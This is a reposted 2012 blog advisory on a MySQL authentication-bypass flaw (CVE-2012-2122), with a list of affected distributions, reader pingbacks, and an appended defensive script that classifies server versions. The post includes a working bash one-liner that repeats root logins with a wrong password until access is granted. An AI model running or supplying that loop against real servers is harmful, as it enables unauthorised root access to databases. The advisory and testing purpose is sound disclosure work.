REPOST: A Tragically Comedic Security Flaw in MySQL

“In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.”

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

The following distributions are confirmed to be vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
  • Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
  • Fedora ( via hexed and confirmed by Red Hat )
  • Arch Linux (unspecified version)

Full details can be found at https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

6 Responses to “REPOST: A Tragically Comedic Security Flaw in MySQL”

  1. Joseph Scott says:

    Of course to exploit this you’d need to allow remote logins to your MySQL server from outside your network (or find a way to get access to the inside), which would be a bad idea in general.

  2. ronald says:

    As you can see from the statistics in the post, there are 100s of thousands of MySQL servers that are accessible, most likely due to existing poor practices.

  3. [...] If you use your own or third-party binaries, we cannot guarantee that they built properly, and therefore, binaries based on versions 5.5.23 or earlier and 5.1.62 or earlier may be affected by this security vulnerability. You can test if it is, using, for example, the script from this post. [...]

  4. [...] If you built your binaries yourself, you (or your database administrator) can easily test if your installation is vulnerable or not by following the instructions found e.g. here http://ronaldbradford.com/blog/repost-a-tragically-comedic-security-flaw-in-mysql-2012-06-11/. [...]

  5. [...] If you built your binaries yourself, you (or your database administrator) can easily test if your installation is vulnerable or not by following the instructions found e.g. here http://ronaldbradford.com/blog/repost-a-tragically-comedic-security-flaw-in-mysql-2012-06-11/. [...]

  6. [...] If you use your own or third-party binaries, we cannot guarantee that they built properly, and therefore, binaries based on versions 5.5.23 or earlier and 5.1.62 or earlier may be affected by this security vulnerability. You can test if it is, using, for example, the script from this post. [...]
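
A triage helper for the version ranges quoted in the responses above (5.5.23 or earlier, 5.1.62 or earlier), as an added example that is not part of the original post or its responses. It assumes version strings as returned by `SELECT VERSION()`; the host names and inventory are constructed, and a match only means "may be affected", since the responses say the outcome depends on how the binary was built.

```bash
#!/bin/sh
# Added example, not from the original post. Classifies MySQL server version
# strings against the ranges quoted in the responses:
#   5.5 series: 5.5.23 or earlier    5.1 series: 5.1.62 or earlier
# Other release series are not covered by the page and are reported "unknown".

# classify_mysql_version VERSION
# Prints one of: possibly-affected | not-in-range | unknown
classify_mysql_version() {
    # Keep the leading x.y.z only; drops suffixes such as "-log" or "-2".
    ver=$(printf '%s\n' "$1" |
        sed -n 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    [ -n "$ver" ] || { echo unknown; return; }
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    case "$major.$minor" in
        5.5) last=23 ;;   # last release in the quoted 5.5 range
        5.1) last=62 ;;   # last release in the quoted 5.1 range
        *)   echo unknown; return ;;
    esac
    if [ "$patch" -le "$last" ]; then
        echo possibly-affected
    else
        echo not-in-range
    fi
}

# triage_inventory: reads "host version" lines on stdin and appends the
# classification, so hosts that need a hands-on check stand out.
triage_inventory() {
    while read -r host version; do
        [ -n "$host" ] || continue
        printf '%s %s %s\n' "$host" "$version" \
            "$(classify_mysql_version "$version")"
    done
}

# Constructed inventory (hypothetical host names).
triage_inventory <<'EOF'
db-a 5.5.23-log
db-b 5.5.24
db-c 5.1.62
db-d 5.6.10
EOF
```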